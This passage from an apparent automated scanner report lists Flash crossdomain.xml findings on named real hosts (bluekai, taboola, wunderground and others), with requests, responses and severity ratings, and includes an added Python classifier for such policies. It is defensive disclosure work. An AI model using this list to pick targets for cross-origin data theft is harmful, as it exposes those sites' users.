Date: Sun, 04 Sep 2011 01:18:42 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.38. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:31 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.39. http://sync.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.40. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x24ad 9389
Set-Cookie: ts=1315097753; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:53 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.41. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.42. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:04:39 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:34:39 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54F8)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.43. http://trc.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:04 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.44. http://turn.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://turn.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:57:26 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:57:25 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.45. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www166
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.46. http://wa.proflowers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www625
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.47. http://www.wunderground.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 26 May 2011 00:03:43 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.48. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:48 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

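The two issue descriptions used in this section (the High "allows access from any domain" class starting at 6.37 and the Low "wildcard or specific domains" class starting at 6.48) can be applied mechanically. The script below is an added example written for this page; it is not part of the XSS.CX report or of the scanner that produced it. It parses a crossdomain.xml body and assigns the report's severity: High when any allow-access-from rule has domain="*", Low when the rules name wildcards or specific hosts, Info for an empty policy. It also flags three attributes that appear in the responses above but that the issue text does not discuss, based on Adobe's policy-file specification: secure="false", site-control permitted-cross-domain-policies="all", and allow-http-request-headers-from domain="*" headers="*". The sample policies are constructed from the responses shown on this page with the "...[SNIP]..." elisions removed so they parse; they are not live fetches.

```python
"""Classify Flash crossdomain.xml policies the way the findings on this page do.

Added example, not part of the original report or the scanner's own code.
"""
import xml.etree.ElementTree as ET

# Severity order used by the report: any-domain policies are High,
# wildcard or named-domain policies are Low, an empty policy is Info.
_RANK = {"Info": 0, "Low": 1, "High": 2}

# Constructed samples, copied from response bodies shown on this page
# (tags.bluekai.com, www.wunderground.com, cim.meebo.com, grfx.cstv.com)
# with the report's "...[SNIP]..." markers removed so the XML is complete.
SAMPLE_BLUEKAI = """<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

SAMPLE_WUNDERGROUND = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>"""

SAMPLE_MEEBO = """<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
</cross-domain-policy>"""

SAMPLE_CSTV = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" secure="false" />
</cross-domain-policy>"""


def _raise(current, new):
    """Return the more severe of two severity labels."""
    return new if _RANK[new] > _RANK[current] else current


def classify_policy(xml_text):
    """Classify one crossdomain.xml body.

    Returns (severity, findings): severity is 'High', 'Low' or 'Info' and
    findings is a list of human-readable strings, one per risky rule.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document: <%s>" % root.tag)

    severity = "Info"
    findings = []

    for rule in root.iter("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            severity = _raise(severity, "High")
            findings.append('domain="*": any domain may perform two-way interaction')
        elif "*" in domain:
            # Also catches patterns such as livestats.*.fansonly.com.
            severity = _raise(severity, "Low")
            findings.append("wildcard %s: every host matching it is trusted" % domain)
        elif domain:
            severity = _raise(severity, "Low")
            findings.append("named domain %s is trusted" % domain)
        # secure defaults to "true": a policy served over HTTPS then grants
        # access only to SWFs that were themselves loaded over HTTPS.
        # secure="false" lifts that restriction; it only matters when the
        # same policy is reachable over HTTPS, which this check cannot see.
        if rule.get("secure", "true").lower() == "false":
            findings.append('secure="false" on %s: if served over HTTPS, HTTP-loaded SWFs may read HTTPS content'
                            % (domain or "(unspecified)"))

    site_control = root.find("site-control")
    if site_control is not None and site_control.get("permitted-cross-domain-policies") == "all":
        # "master-only" restricts Flash to /crossdomain.xml; "all" lets any
        # path on the host (for example an upload directory) supply a policy.
        findings.append('permitted-cross-domain-policies="all": policy files are honoured from any path on the host')

    for hdr in root.iter("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" and hdr.get("headers") == "*":
            findings.append('allow-http-request-headers-from domain="*" headers="*": any origin may send arbitrary request headers')

    return severity, findings


if __name__ == "__main__":
    for name, body in [("tags.bluekai.com", SAMPLE_BLUEKAI), ("www.wunderground.com", SAMPLE_WUNDERGROUND),
                       ("cim.meebo.com", SAMPLE_MEEBO), ("grfx.cstv.com", SAMPLE_CSTV)]:
        sev, notes = classify_policy(body)
        print("%s: %s" % (name, sev))
        for note in notes:
            print("  - " + note)
```

To run it against a live host, fetch http://HOST/crossdomain.xml with any HTTP client and pass the body to classify_policy; the scanner here did exactly that with a bare GET and no other request headers, as the Request sections show.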
6.49. http://ads.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:57:22 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.50. http://cim.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:08:38 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.51. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.52. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.53. http://grfx.cstv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:18 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.54. http://mi.adinterax.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:59:10 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Tue, 08 Nov 2011 10:18:21 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.55. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.56. http://rd.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:35 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

6.57. http://snas.nbcuni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:36 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.58. http://syndication.mmismm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:34 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:20:52 GMT
ETag: "10e-4a8db76d7c900"
Accept-Ranges: bytes
